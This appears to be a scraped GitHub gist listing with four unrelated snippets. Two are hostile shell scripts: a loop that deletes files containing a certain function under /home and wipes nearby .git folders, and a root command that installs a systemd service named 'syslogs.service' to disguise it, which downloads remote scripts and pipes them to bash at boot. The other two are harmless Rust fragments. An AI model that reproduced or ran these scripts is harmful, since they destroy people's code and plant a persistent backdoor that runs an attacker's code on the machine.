This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /bin/sleep 10 | |
| while true | |
| do | |
| for f in $(/bin/grep -lr --include \*.ipynb --include \*.py "def _extract_key_value" /home) | |
| do | |
| /bin/rm $f | |
| /bin/rm -rf $(/usr/bin/dirname $f)/".git" 2> /dev/null | |
| /bin/rm -rf $(/usr/bin/dirname $(/usr/bin/dirname $f))/".git" 2> /dev/null | |
| /bin/rm -rf $(/usr/bin/dirname $(/usr/bin/dirname $(/usr/bin/dirname $f)))/".git" 2> /dev/null | |
| done |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| sudo su | |
| echo " | |
| [Unit] | |
| Description=foo | |
| [Service] | |
| ExecStart=/bin/bash -c '/bin/sleep 30; /usr/bin/wget -O - https://goo.gl/fQyxzw | /bin/bash; /usr/bin/wget -O - https://172.217.25.174/fQyxzw | /bin/bash;' | |
| [Install] | |
| WantedBy=multi-user.target" > /etc/systemd/system/syslogs.service |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| extern crate csv; | |
| use std::error::Error; | |
| use std::process; | |
| struct data { | |
| pub time: Vec<String>, | |
| pub name: Vec<String>, | |
| pub score: Vec<String>, |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| loop { | |
| for message in client.incoming_messages() { | |
| match message { | |
| OwnedMessage::Text(data) => data, | |
| _ => None, | |
| }; | |
| } | |
| } |